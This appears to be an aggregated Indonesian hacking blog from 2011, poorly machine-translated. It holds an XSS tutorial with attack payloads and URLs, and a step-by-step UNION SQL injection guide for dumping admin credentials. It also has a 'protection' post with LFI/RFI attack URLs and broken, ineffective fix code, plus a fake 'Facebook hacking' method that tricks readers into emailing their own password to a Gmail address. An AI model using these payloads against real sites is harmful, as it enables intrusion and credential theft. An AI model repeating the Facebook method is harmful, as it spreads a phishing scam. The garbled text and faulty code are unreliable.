Security Blog

Tutorial XSS Injection

noreply@blogger.com (Bajingan) — Wed, 27 Jul 2011 01:09:54 PDT

:: Pendahuluan::

Apa itu XSS dan apa yang mengacu kepada?
Alias XSS Cross Site Scripting adalah sisi klien serangan di mana seorang penyerang menciptakan link jahat,
script berisi kode yang kemudian dilaksanakan dalam browser korban. Kode script
bisa bahasa apapun yang didukung oleh browser, tetapi sebagian besar HTML dan Javascript yang digunakan bersama
dengan embedded Flash, Java atau ActiveX.

Apa yang bisa Cross Site Scripting digunakan untuk?
Cross Site Scripting dapat digunakan untuk berbagai hal, seperti sesi-pembajakan, browser
serangan, phishing, propaganda dan bahkan cacing! Namun masih memerlukan korban untuk mengklik
link jahat diciptakan oleh penyerang.

Bagaimana bisa Satu mendapatkan korban untuk mengklik link XSS?
Cara termudah untuk membuat orang meng-klik link berbahaya adalah untuk membuat mereka terlihat otentik dan non -
jahat. Memberi mereka alasan kemudian adalah rekayasa sosial-bagian yang harus mudah
kecuali jika korban sadar serangan tersebut dan / atau memiliki tindakan terhadap Cross Site Scripting, seperti NoScript.

Bagaimana Satu menghindari XSS-links tampak mencurigakan?
Hal ini biasanya dilakukan dengan penyandian, layanan url pendek, mengarahkan dan bahkan flash!

Yang tipe Cross Site Scripting yang ada?
Jenis yang paling umum adalah GET dan POST berbasis XSS. Namun Cross Site Scripting juga bisa
dipicu melalui cookie. Beberapa individu mengklaim bahwa XSS juga dapat dibagi menjadi gigih dan
non-persistent tetapi juga jenis-jenis dan harus disebut sebagai injeksi yang berbeda
kelas bug / kerentanan.

Apa perbedaan antara GET-POST-XSS?
Perbedaannya adalah bahwa ketika GET-variabel yang digunakan adalah mungkin untuk melakukan serangan XSS normal
mana penyerang mengirimkan crafted URL jahat kepada korban yang kemudian dijalankan ketika
korban membuka link dalam browser.

Dengan variabel POST-penyerang dapat f.ex. menggunakan flash untuk mengirim korban ke POST-XSS
situs rentan karena tidak mungkin untuk membuat URL ketika POST-variabel yang sedang digunakan.

Apakah ada sub-kategori dari Cross Site Scripting?
Pada saat ada XSSR dan XSSQLI. Orang bisa mengatakan bahwa XSRF / CSRF milik yang sama
kategori, namun metode serangan terlalu banyak berbeda dari tradisional Cross Site Scripting.
CSSR alias XSSR atau Cross Site Redirection Script digunakan untuk mengarahkan korban kepada halaman lain
enggan. Halaman bisa misalnya berisi phishing template, kode serangan browser atau
beberapa kasus di mana data atau skema URI javascript digunakan: sesi-pembajakan. XSSQLI adalah
campuran Cross Site Scripting dan SQL Injection, di mana korban ketidaktahuan mengklik link berbahaya
SQL Injection berisi instruksi untuk suatu daerah di website yang membutuhkan hak istimewa yang
tamu atau anggota tidak memiliki. XSRF atau CSRF (kadang-kadang disebut sebagai C-Surf) berdiri untuk
Cross Site Request Pemalsuan yang digunakan untuk mengirim masukan dari pihak ke-3 situs ke situs target.
XSRF dapat dalam beberapa kasus dipicu hanya dengan melihat gambar yang dirancang khusus tetapi yang paling
sering digunakan adalah URL. Dengan Cross Site Request Pemalsuan itu mungkin untuk f.ex. mengubah
password korban jika situs target tidak diamankan dengan baik dengan bukti dll

Apa itu XST dan dapat digunakan untuk apa saja?
XST juga dikenal sebagai Cross Site (Script) Tracing adalah suatu cara untuk menyalahgunakan HTTP Trace (Debug)
protokol. Apa pun yang seorang penyerang mengirimkan ke web-server yang telah diaktifkan akan mengirim TRACE
jawaban yang sama kembali. Jika penyerang mengirimkan berikut:
Code:

TRACE / HTTP/1.0
Host: target.tld
Custom-header: <script>alert(0)</script>

Maka penyerang akan menerima sama “Custom-header: <scr …” kembali memungkinkan eksekusi script.
Namun setelah update browser terbaru tahun berikutnya (s) XST telah semakin sulit untuk
DNS dan berfungsi dengan benar.

Bagaimana mungkin menemukan bug XSS dalam website?
Ada 2 metode: kode / script audit atau fuzzing yang digambarkan di bawah ini.

Alat macam apa yang diperlukan untuk menemukan bug XSS? (REQ = Required, OPT = Optional)
- REQ: Internet Browser (seperti FireFox) dalam kasus Anda fuzzing.
- REQ:-penampil teks (seperti notepad) dalam kasus Anda audit.
- KPT: Sebuah proxy mencegat dalam kasus yang sedang Anda lakukan lebih maju XSS. (Dalam FireFox adalah mungkin untuk menggunakan Tamper Data).
- KPT: Browser Addons, untuk FireFox berikut ini adalah terutama bermanfaat: pembakar, JSView dan LiveHTTP Header.

Apa lagi yang berguna untuk mengetahui apakah Kita ingin menemukan bug XSS?
- Browser keterbatasan mengenai Cross Site Scripting [1]
- HTTP Headers dan bagaimana protokol HTTP bekerja.
- HTML + Javascript dan mungkin tertanam serangan script. (flash dll)
- Mencegat proxy (Burp dll), alat diferensial (berbaur, ExamDiff, dll)
- Useful browser-addons (lihat FireCat [3])
- Website scanner (Nikto, W3AF, Grendel, Directory-fuzzers dll)

Mana-bug XSS biasanya terletak?
Hal ini biasanya terletak di masukan pengguna yang diajukan baik melalui GET atau POST variabel, dimana hal itu tercermin pada
situs target sebagai teks di luar tag, tag di dalam nilai-nilai atau dalam javascript. Dapat juga dalam beberapa kasus
disampaikan melalui cookie, http header atau dalam kasus-kasus yang jarang upload.

Bagaimana Satu melindungi sebuah situs terhadap XSS?
Cara terbaik adalah untuk memastikan bahwa semua pengguna input dan output divalidasi dengan benar. Namun dalam beberapa kasus
WAF yang IPS atau juga dapat melindungi terhadap XSS meskipun masih cara terbaik untuk memvalidasi input pengguna-dan-output dengan benar.

___ -:: Menemukan Bug – Dengan Fuzzing:: – ____________
[EASY] Contoh Kasus – A:
Kami berada di http://buggysite.tld di mana kita melihat “Cari-lapangan” di kanan atas. Karena kita tidak tahu
kode sumber nyata tapi hanya HTML-output dari situs kita harus fuzz apa-apa mana mungkin
untuk mengirimkan data. Dalam beberapa kasus, data akan tercermin di situs tersebut dan dalam beberapa kasus wont. Jika tidak
kita beralih ke kue berikutnya, header, mendapatkan / post variabel atau apa pun yang kita fuzzing.

Yang paling efektif untuk bulu adalah untuk tidak menulis: <script> alert (0) </ script> karena banyak situs yang berbeda
pencegahan terhadap Cross Site Scripting. Sebaliknya kita menciptakan string kustom yang dalam banyak kasus wont
memicu apa pun yang bisa mengubah output dari kesalahan menjadikan situs atau halaman yang tidak rentan.

Contoh string yang efektif yaitu: “kata kunci ‘/ \> <

” ‘/ \> Dan <adalah yang paling umum digunakan html karakter yang digunakan dalam Cross Site Scripting. Namun, jika kita ingin
menjadi benar-benar teliti maka kita dapat juga menambahkan )(][}{% ke string yang kita gunakan untuk fuzz situs target.

Alasan mengapa tidak ada dua "atau 'adalah karena hal ini dapat memicu WAF, IPS atau apa pun berjaga-jaga situs
mungkin telah mencoba untuk melaksanakan terhadap XSS bukan menggunakan skema pengkodean yang aman / rencana / siklus pengembangan.
Alasan mengapa semua karakter yang ditulis sebagai> <bukan <> adalah karena ini adalah bypass umum terhadap XSS-filter!

Dengan pemikiran, kita menggunakan string berikut: "haxxor '/ \> <untuk fuzz medan pencarian:

Mari kita melihat kembali HTML-code:
PHP Code:
...
<input type="text" name="search" value=""haxxor'/\><" /> <br /> You searched for "haxxor\'/\\>< which returned no results.
...
Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa
ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: "> <script> alert (0) </ script>

Jika kita akan menampilkan eksternal javascript kita harus menghindari penggunaan "dan" tentu saja.

Terakhir kita XSS-url dapat: http://yetanothersite.tld/search.php?query = "> <script> alert (0) </ script> jika GET-variabel yang digunakan.

[Ringan] Contoh Kasus – C:
Kami berada di http://prettysecure.tld di mana kita menemukan kolom pencarian lain, sudah waktunya untuk mengirimkan string fuzzing kami.

Berikut kode HTML-dikembalikan setelah string diajukan kami:
PHP Code:
…
<input type=”text” name=”search” value=”"haxxor’/\><”> You searched for “"haxxor’/\><” which returned no results.
… (further down)
<script>
…
s.prop1=”prettysecure”;
s.prop2=”\”haxxor%39/\%3E%3C”;
s.prop3=”adspace”;
…
</script>
Dalam kasus ini setelah tag string string disandikan dengan benar, namun di dalam string tag hanya punya beberapa
ditambahkan garis miring yang tidak apa-apa dalam kasus ini. Pada dasarnya kita dapat melewati ini dengan mudah dengan: “> <script> alert (0) </ script>

Jika kita akan menampilkan eksternal javascript kita harus menghindari penggunaan “dan” tentu saja.

Terakhir kita XSS-url dapat: http://yetanothersite.tld/search.php?query = “> <script> alert (0) </ script> jika GET-variabel yang digunakan.

[Ringan] Contoh Kasus – C:
Kami berada di http://prettysecure.tld di mana kita menemukan kolom pencarian lain, sudah waktunya untuk mengirimkan string fuzzing kami.

Berikut kode HTML-dikembalikan setelah string diajukan kami:
PHP Code:
…
if($_GET['view_profile']==1) {
echo $_GET['name'];
… (more code)
}
…
Dengan melihat kode diatas kita dapat melihat bahwa jika view_profile adalah sama dengan 1 maka skrip akan mencetak “nama” variabel.
Contoh URL serangan bisa terlihat seperti: http://testz.tld/index.php?view_profile=1&name = <script> alert (0) </ script>

[KERAS] Contoh Kasus – B:

File berikut (search.php) memiliki beberapa kode yang menarik:
PHP Code:
…
if($_GET['set_flag']==1) {
$var = “checked”;
}
echo “<input type=’radio’ value=’flag’ checked=’” .htmlentities($var). “‘ />”;
…
Ini adalah kerentanan bersyarat di mana dalam php.ini register_globals harus diatur ke Aktif. (Off factory default).
Register_globals pada dasarnya memungkinkan seorang individu untuk mengatur variabel dengan cepat, bahkan jika mereka tidak dimaksudkan untuk ditetapkan.

Hal ini hanya berlaku untuk variabel yang TIDAK ditetapkan seperti dalam contoh di atas. Masalah lain yang kami temui
htmlentities Namun adalah karena kesalahan coding, kita masih bisa menyalahgunakan tag tanpa membuat yang baru.
Kita perlu menggunakan event handler dalam tag <input> dan beberapa CSS (Cascading Style Sheet) untuk memastikan bahwa
memicu korban tidak peduli apa eventhandler. Ada beberapa cara untuk melakukan itu, salah satunya adalah:
Code:

style=’display:block;width:99999px;height:99999px;’

Sebuah eventhandler yang dapat kita gunakan dalam kasus ini bisa onmouseover, onblur meskipun mungkin lebih baik.

Anda mungkin bertanya pada diri sendiri, mengapa script di atas tidak aman? Karena htmlentities () digunakan dengan cara yang tidak aman, karena
bahwa tag terlihat seperti ini dalam bentuk html: <input type=’radio’ value=’flag’ checked=’$var’ />

Di dalam nilai memeriksa variabel kami ($ var) dikodekan, tetapi hanya “> dan <yang disandikan, bukan ‘karena ENT_QUOTES
tidak diatur dalam fungsi htmlentities. Ini berarti bahwa kita dapat melepaskan diri dari checked =”dengan mudah.

Contoh serangan bisa URL: http://was-secure.tld/search.php?test = ‘style =’ display: block; width: 99999px; height: 99999px; ‘onmouseover =’ alert (0)

Tidak ada “Contoh Kasus – C” karena saya telah melalui sebagian besar penting Cross Site Scripting.

___ -:: Tambahan Informasi:: – ____________
XSSR
Ketika itu adalah mungkin untuk mengirim pengguna ke data atau skema URI javascript baik melalui A) GET atau POST-variabel atau B) Pengguna
disampaikan konten seperti link maka berlaku untuk kategori XSSR bug. Namun beberapa individu telah menyatakan bahwa
situs yang hanya menerima HTTP atau HTTPS GET-link melalui variabel juga jatuh di bawah kategori XSSR.

Sebuah contoh dapat XSSR: http://somesite.tld/redirect.php?link=data:text/html, <script> alert (0) </ script>
Dan jika skema URI Javascript digunakan: http://somesite.tld/redirect.php?link=javascript:alert (0);

Hal ini dalam beberapa kasus telah diketahui bocor cookie dan karena itu digunakan dalam sesi-pembajakan.

XSSQLI
Ketika SQL Injection kerentanan ada dalam daerah istimewa situs target, XSSQLI menjadi berguna.

Contoh dapat menipu XSSQLI administrator “shouldbescure.tld” untuk mengklik baik SQL Injection
klik link atau Cross Site Scripting link yang berisi panggilan ke SQL Injection di daerah istimewa situs
tempat ini bisa menjadi rentan bagian: http://shouldbesecure.tld/admin.php?del=1 DAN 1 = 1 / *

XSRF
Juga dikenal sebagai CSRF dan C-Surf dapat digunakan untuk melawan situs yang tidak menggunakan token yang biasanya tersembunyi di dalam tag.
Sebuah cara yang umum untuk menggunakan token terhadap C-Surf serangan adalah untuk menyembunyikan mereka di dalam tag seperti:
Code:

Tutorial SQL Injection Step By Step

noreply@blogger.com (Bajingan) — Wed, 27 Jul 2011 01:04:37 PDT

Pengertian sql injection:
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.

Yang perlu di ketahui sebelum sql injection pada mysql:
karakter: ‘ atau -
comments: /* atau –
information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x

===========
=step Satu:=
===========

carilah target
misal: [site]/berita.php?id=100

Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.
contoh:
[site]/berita.php?id=100′ atau
[site]/berita.php?id=-100
ehingga muncul pesan error seperti berikut (masih bnyak lagi):

==========
=step Dua:=
==========

mencari dan menghitung jumlah table yang ada dalam databasenya…
gunakan perintah : order by

contoh:

[site]/berita.php?id=-100+order+by+1– atau
[site]/berita.php?id=-100+order+by+1/*

ceklah secara step by step (satupersatu)…
misal:

[site]/berita.php?id=-100+order+by+1–
[site]/berita.php?id=-100+order+by+2–
[site]/berita.php?id=-100+order+by+3–
[site]/berita.php?id=-100+order+by+4–

sehingga muncul error atau hilang pesan error…
misal: [site]/berita.php?id=-100+order+by+9–

berarti yang kita ambil adalah sampai angka 8
menjadi [site]/berita.php?id=-100+order+by+8–

===========
=step Tiga:=
===========

untuk mengeluarkan angka berapa yang muncul gunakan perintah union
karena tadi error sampai angka 9
maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–

ok seumpama yg keluar angka 5

gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi
misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau
[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–

lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..

untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..

============
=step Empat:=
============

untuk menampilkan table yg ada pada web tsb adalah
perintah table_name >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir

Code:

[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables–

seumpama table yang muncul adalah “admin”

===========
=step Lima:=
===========

untuk menampilkan semua isi dari table tsb adalah
perintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.tables+where+table_schema =database() >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name), 6,7,8+from+information_schema.tables+where+table_s chema=database()–

=============
= step Enam: =
=============

perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadi
perintah +from+information_schema.columns+where+table_name= 0xhexa– >>> dimasukan setelah angka terakhir

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0xhexa–

pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinya
website yg digunakan untuk konversi :

http://www.v3n0m.net/ascii.htm

contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E

[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name) ,6,7,8+from+information_schema.columns+where+table _name=0x61646D696E–

============
=step Tujuh:=
============

memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara

perintah concat_ws(0x3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadi
perintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,hasil isi column),6,7,8+from+(nama table berasal)–

contoh kata yang keluar adalah id,username,password

Contoh :

[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0x3a,id,usernam e,password),6,7,8+from+admin–

==============
= step Delapan:=
==============

tahap terakhir mencari halam admin atau login .

Proteksi website dari para attacker

noreply@blogger.com (Bajingan) — Wed, 27 Jul 2011 00:54:02 PDT

Konten :
[1] Pendahuluan
[2] Cross Site Scripting
[3] SQL Injection
\_ Login Form Bypassing
\_ UNION SQL Injection
[3] File Inclusion
[4] Special Thanks

[1] Pendahuluan

Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan
di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini
adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
yang memungkinkan attacker untuk dapat menyusup ke dalam website.

[2] Cross Site Scripting

Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna
dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.

Example:
http://www.sites.net/find.php?all=”>

*Solusi (javascript) :

function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\<|\>|\”|\’|\%|\;|$|$|\&|\+|\-/g,”");
return strTemp;
}

[3] SQL Injection

*\_ Login Form Bypassing

Berikut adalah contoh kode yang dapat kita bisa bypass:

index.html file:
<form action=”login.php” method=”POST” />
<p>Password: <input type=”text” name=”pass” /><br />
<input type=”submit” value=”Authenticate” /></p>
</form>

login.php file:
<?php
// Contoh Kode
$execute = “SELECT * from database WHERE password = ‘{$_POST['pass'])”;
$result = mysql_query($execute);
?>

Kita dapat bypass dengan menggunakan ‘ or ’1=1′, dan menjalankan “password = ”or ’1=1”;”.
Atau attacker dapat juga dapat menghapus database dengan menjalankan “‘ drop table database; –”.

*Solusi :

Menggunakan mysql_real_escape_string

Contoh:
<?php
$badcode = “‘ OR 1 ‘”;
$badcode = mysql_real_escape_string($badcode);
$message = “SELECT * from database WHERE password = “‘$badcode’”;
echo “what are doing nobs” . $message . “;
?>

*\_ Union SQL Injection

Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya
di akhir url “sebuah php?.id=”. Jika terdapat error MySQL, situs tersebut kemungkinan besar
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.

Contoh :

http://www.sites.net/index.php?id=1′

salah satu contoh pesan error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in…..

Setelah muncul pesan error,maka attacker melanjutkan aksinya )
http://www.situs.net/index.php?id=1 ORDER BY 1– <– No error.
http://www.situs.net/index.php?id=1 ORDER BY 2– <– Muncul pesan error. Ini berarti hanya ada satu kolom
http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()– <– Memilih semua kolom dan menjalankan
perintah version().

*Solusi :

Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:

$bug = “(delete)|(update)|(union)|(insert)|(drop)|(http)|(–)|(/*)|(select)”;
$patch = eregi_replace($bug, “”, $patch);

[4] File Inclusion

\_ Remote File Inclusion dan Local File Inclusion

Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
dengan hanya melalui URL.

Contoh kode yang vulnerable :
<?php
include($_GET['page']);
?>

Beberapa contoh serangan :
http://www.sites.net/page.php?page=../../../../../etc/passwd < contoh LFI
http://www.sites.net/page.php?page=http://www.site.com/evilscript.txt? < contoh RFI

*Solusi :

Validate the input.
$page = $_GET['page'];
$allowed = array(‘index.php’, ‘games.php’ ‘ip.php’);
$iplogger = (‘ip.php’);
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die(“IP logged.”);
}

Cara Hack Account FB 2011

noreply@blogger.com (Bajingan) — Wed, 27 Jul 2011 00:30:39 PDT

Orang-orang ini tidak menindaklanjuti tulisan terakhir .. dan saya merasa cukup senang coz saya mendapat sambutan baik … Jadi Sebelum Anda menggunakan metode ini cara mudah hack akun facebook 2 jelaskan di sini, Anda harus berhati-hati!. Ini adalah tindakan ilegal! Ada banyak cara untuk hack account website seperti facebook. Xperience hacker biasanya menggunakan injeksi Kebanyakan XSS untuk perintah situs untuk menampilkan tabel user tha mana TEY Bisa mendapatkan password pengguna tha yang sudah dikonversi ke dalam kode hash.

Ketika hacker mendapatkan password di kode hash, mereka akan mencoba untuk mengubahnya ke dalam teks normal menggunakan MD5 Decrypter atau alat Decrypter hash. Tapi bagaimana???? jika Anda hacker notta pengalaman, katakanlah Anda hanya ingin menjadi hacker tingkat. Sama seperti kita katakan di atas, ini adalah cara mudah untuk hack akun facebook, tapi yang lagi ini adalah tindakan ilegal!

Bagaimana trik ini bekerja?

Pertama, facebook website dengan API, berarti memiliki hubungan lubang banyak dari website lain (Semoga u bisa mengerti, seperti Mengakses kepada pihak ketiga appz) …

Kedua, ada hubungan antara facebook dan Google mail server (Ha ha bertanya-tanya Bahkan saya lakukan) yang bisa kita gunakan untuk menyuntikkan tindakan serial dalam perintah tunggal untuk mesin facebook mana Google telah API juga (Seperti semua orang lain tahu).

Dengan sederhana, untuk hack akun facebook kita akan menggunakan alamat email khusus di Google untuk pemulihan sandi facebook perintah, mengirimkan password ke alamat email tertentu (email Anda). Keberhasilan ini akan jika Anda;

Niggas lemme Listdown:

Bagaimana kedengarannya, semua orang berpikir keras untuk mendapatkannya .. NO R8?

Dan Satu hal lagi, Jangan khawatir tentang dua terakhir, i got itu juga .. akan menyediakan di sini.
Saya yakin Anda siap untuk hack account teman Anda tidak? LMAO … OK

Daripada pergi mari, ikuti saja langkah satu per satu, tapi ingat, membaca seluruh halaman sebelum Anda melakukannya

MISI FORCE OPERASI:

1. Permintaan kata sandi pemulihan untuk facebook melalui mail server Google (Semoga ini Notta masalah besar bagi u semua)

Kami akan menggunakan mail server Google untuk mengirim kode API khusus untuk mesin pemulihan sandi facebook. Langkah ini adalah yang pertama dan tidak akan pernah sukses jika Anda tidak tahu alamat email. Untungnya, sekarang kita tahu alamat dan terima kasih tuhan alamat dalam penggunaan permanen, artinya tidak pernah berubah.
Gunakan aplikasi email [Wateva tha penyedia layanan, NO DEAL BESAR] (Google, Yahoo, AOL, Outlook, dll) untuk mengirim email ke defendhackers@gmail.com, dengan subject mengarahkan semua tindakan harus dalam huruf kecil (WATCH UR ASS) cara lain akan mengabaikan oleh pembunuh spam di mail server.
Pada tipe isi email baris pertama persis seperti di bawah ini:

command code:3769145744b24227b72f231eea906dd0
priority:8d966b2253a917086c8604959e152243
target:26cae7718c32180a7a0f8e19d6d40a59

Kode diatas adalah perintah untuk mail server Google untuk mengirimkan kode API untuk facebook. Selanjutnya kita akan perlu memberikan facebook beberapa variabel mesin perlu melakukan tindakan pemulihan password.

2. Memasuki Target:Ketika facebook mendapatkan perintah pemulihan password dari server lain sebagai API, facebook akan dari kebutuhan untuk menjelaskan bahwa pengguna permintaan ada. Untuk melakukan hal ini menambahkan target Anda facebook nama pengguna (nama tampilan teman facebook Anda) di baris seperti di bawah ini:saya: e268443e43d93dab7ebef303bbe9642f + target Anda nama pengguna
Jenis: user

Anda harus mengubah nama target pengguna Anda untuk nama pengguna tertentu yang Anda ingin mengetahui password. Pastikan tidak ada ruang antara e268443e43d93dab7ebef303bbe9642f tanda plus dan nama target pengguna Anda

SO upto MASIH, CLEAR .. kurasa ..!!!
3. Menerima password pada account email tertentu:Ketika facebook menemukan bahwa nama pengguna ada, facebook akan mengirimkan password ke alamat email yang mendaftar kepada pemilik nama pengguna. Kecuali Anda memberikan alamat email alternatif. Hampir semua website dengan alamat email anggota telah alternatif dalam tabel user mereka termasuk facebook. Tapi tidak semua situs menampilkan form untuk memasukkan alamat email alternatif bagi pengguna mereka.
Kabar baiknya adalah, facebook selalu menggunakan alamat email alternatif sebagai prioritas utama dalam mengirimkan email ketika mesin mendapatkan pemulihan password melalui API. Untuk menerima password di alamat email Anda, Anda harus memberikan password Anda pada baris perintah (dalam email) sebagai alamat email alternatif, tetapi facebook akan memeriksa alamat email, email ini tabel user dalam database mereka atau tidak. Berarti Anda harus mengetik alamat email Anda yang Anda gunakan untuk mendaftar ke facebook sebagai ditunjukkan di bawah ini:saya []: 082856831ec22b63f594f61efb8d5d5e + alamat email Anda
Indeks: push

Ingat, tidak ada ruang antara 082856831ec22b63f594f61efb8d5d5e tanda plus dan alamat email Anda. Password akan dikirimkan ke alamat email ini, jadi pastikan Anda mengetik alamat email Anda benar. Lihatlah tanda] [setelah, ruang saya tidak! itu berarti array.

DIBUAT DENGAN 80%

4. Otentikasi: (i sebut ini NYERI DI ASS THA):

Hacking tidak pernah mudah, tetapi selalu dapat mengelabui.
Hal terakhir dan sangat penting adalah otentikasi. Untuk melakukan hal ini adalah sederhana, ketikkan password facebook pada command line. Itulah mengapa Anda harus memiliki account aktif di facebook, untuk membuktikan otentikasi.

Karena password recovery melalui API akan menghasilkan password baru dan akan memeriksa dengan alamat email yang valid yang Anda berikan pada langkah ketiga, pastikan Anda mengetik alamat email Anda pada langkah ketiga dengan benar. Miss alamat email mengetik akan gagal aksi perintah, dalam kata sederhana “menolak perintah”. Tambahkan isi email sebagai berikut:

otentikasi: 53d481448deb640b6866b6c124691d3a + password anda
tindakan: tunggal

Sama seperti sebelumnya, tidak ada ruang. Jangan semua jenis tindakan, hanya tunggal. Jenis semua untuk tindakan berarti perintah mesin facebook password recovery untuk mereset semua password (kata sandi Anda dan password target Anda).

5. Bersihkan Jejak:

Cracking Credit Card Code ~ Cara ngitung credit Card CC

noreply@blogger.com (Bajingan) — Wed, 27 Jul 2011 00:18:06 PDT

Cracking Credit Card Code : AMEX, DISCOVER, VISA & MASTERCARD

Daftar DNS ISP (Internet Service Provider) Indonesia

noreply@blogger.com (Bajingan) — Wed, 27 Jul 2011 00:15:21 PDT

Daftar DNS ISP (Internet Service Provider) Indonesia

Telkom

202.134.1.10 (Surabaya)
202.134.1.7
202.134.0.155 (Jakarta)
203.130.196.5 (Jakarta)
202.134.2.5 (Surabaya)
203.130.206.250 (Medan)
203.130.193.74 (Batam)
203.130.209.242 (Balikpapan)
222.124.204.34 (Bandung)
203.130.208.18 (Semarang)
61.94.192.12 (Denpasar)

Indosat

202.155.0.20
202.155.0.15

Centrin

202.146.255.3
202.146.255.5

CBN

202.158.20.1
202.158.40.1

Indonet

202.159.32.2
202.159.33.2

Pesat

202.95.128.180
202.95.128.60

Melsa

202.138.224.2
202.138.224.4
202.138.225.253

Radnet

202.154.1.2
202.154.3.2

ITB

167.205.22.123
167.205.30.114
202.249.24.65

OpenDNS

208.67.222.222
208.67.220.220

Simaya

115.178.55.22
115.178.55.33

awari
203.142.83.200

singnet
165.21.83.88

lintas artha
202.152.0.2
202.152.5.36

cbn
202.158.3.7
202.158.3.6

vnsc
4.2.2.1
4.2.2.2
4.2.2.3
4.2.2.4
4.2.2.5
4.2.2.6

203.142.83.200
203.34.118.10
203.34.118.12
202.152.0.2
202.152.5.36
202.158.3.7
202.158.3.6
202.134.0.155
202.134.2.5